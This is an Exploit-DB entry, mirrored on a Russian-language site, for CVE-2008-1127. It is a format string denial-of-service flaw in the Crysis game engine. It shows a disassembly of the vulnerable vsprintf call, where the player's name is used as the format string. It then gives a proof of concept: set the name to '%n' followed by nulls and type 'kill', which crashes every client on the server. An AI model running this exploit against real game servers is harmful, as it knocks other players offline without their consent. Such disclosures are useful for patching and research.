- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5201
- Проверка EDB
-
- Пройдено
- Автор
- LONG POKE
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2008-1127
- Дата публикации
- 2008-02-28
Код:
The Crysis engine passes along internal debug strings through the game. One of them is passed to vsprintf() in the crt lib:
30503263 8D8C24 10100000 LEA ECX,DWORD PTR SS:[ESP+1010]
3050326A 51 PUSH ECX
3050326B 50 PUSH EAX
3050326C 8D5424 08 LEA EDX,DWORD PTR SS:[ESP+8]
30503270 52 PUSH EDX
30503271 FF15 F8A17530 CALL DWORD PTR DS:[<&MSVCR80.vsprintf>] ; MSVCR80.vsprintf
0032CAD8 30503277 w2P0 /CALL to vsprintf from cryactio.30503271
0032CADC 0032CAE8 èÊ2. |buffer = 0032CAE8
0032CAE0 0032DAF8 øÚ2. |format = "Pathfinding in animation graph failed (LONGPOKE%SAAAAAAAA) - no path from 'Parachute_Float_NW' to 'X_Combat_IdleAimingNull_NW'" ; Your name is passed in as part of the format. This is a nono...
0032CAE4 0032DAF8 øÚ2. \arglist = 0032DAF8
POC:
Type name %n\x00\x00\x00\x00 in the console.
Type kill.
Upon your death, everyone in the server will instantly execute the format string vulnerability. If you are in third person in a vehicle, it will be exploited on your game as well.
-LONGPOKE<ATOM>
# milw0rm.com [2008-02-28]
- Источник
- www.exploit-db.com